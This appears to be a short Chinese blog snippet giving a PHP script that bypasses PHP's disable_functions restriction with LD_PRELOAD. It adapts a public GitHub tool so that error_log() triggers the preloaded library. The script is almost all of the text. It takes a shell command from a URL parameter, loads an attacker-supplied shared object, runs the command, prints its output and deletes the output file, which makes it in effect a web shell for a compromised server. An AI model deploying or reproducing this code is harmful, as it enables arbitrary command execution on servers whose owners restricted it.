## error_log
> https://github.com/ianxtianxt/bypass_disablefunc_via_LD_PRELOAD/blob/master/bypass_disablefunc.php
将mail例子中的mail(“”, “”, “”, “”);替换为error_log(“a”,1);
“`php
example: http://www.baidu.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so
“;
$cmd = $_GET[“cmd”];
$out_path = $_GET[“outpath”];
$evil_cmdline = $cmd . ” > ” . $out_path . ” 2>&1″;
echo “
cmdline: ” . $evil_cmdline . “
“;
putenv(“EVIL_CMDLINE=” . $evil_cmdline);
$so_path = $_GET[“sopath”];
putenv(“LD_PRELOAD=” . $so_path);
error_log(“a”,1);
echo “
output:
” . nl2br(file_get_contents($out_path)) . “
“;
unlink($out_path);
?>
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容